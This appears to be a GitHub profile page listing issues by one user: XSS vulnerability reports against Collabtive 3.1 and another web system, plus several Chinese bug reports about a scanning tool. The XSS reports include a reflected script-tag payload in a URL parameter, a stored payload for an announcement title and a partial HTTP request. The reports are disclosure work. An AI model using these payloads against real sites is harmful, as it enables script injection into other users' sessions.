ki9mu

icon location Shanghai

Results 6 issues of ki9mu

XSS storage vulnerability

``` POST /collabtive31/manageuser.php?action=edit HTTP/1.1 Host: 192.168.157.128 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27687000601228424248921889151 Content-Length: 3518 Origin: http://192.168.157.128...

XSS vulnerability

http://192.168.157.128/collabtive31/managefile.php?action=movefile&id=1&target=%22%3E%3Cscript%3Ealert`xss`%3C/script%3E ![1111](https://user-images.githubusercontent.com/47977616/84120526-82713780-aa68-11ea-989d-62584429dc66.png)

There is two XSS vulnerability

After the administrator logged in, open the following page system management->Notice notice Then add the following XSS statement to the announcement title poc: `”>alert`xss`` there is post package: POST /system/notice/edit...

扫描结果异常

1 comment

异常日志一: ![7fc4456d03fa8a299d0a9163e1cb166](https://user-images.githubusercontent.com/47977616/191532883-8ef37b2a-5025-455f-9ff6-295b8e047ac3.png) 异常日志二: ![29625967d823921d3421f80915850b3](https://user-images.githubusercontent.com/47977616/191532968-d0c60a6f-03d2-4705-93c2-0115d154a97e.png) 页面异常状态: ![1663771249361](https://user-images.githubusercontent.com/47977616/191534714-d1269e47-a4f9-4957-a3a4-0229fca8db29.png)

2.5.2版本任务管理里指纹统计的搜索功能不可用,搜索后仍为之前的指纹

1 comment

![image](https://user-images.githubusercontent.com/47977616/190888099-c05438b4-0f22-41e5-8f3d-2a0597d08197.png)

该更新啦

1 comment

该更新啦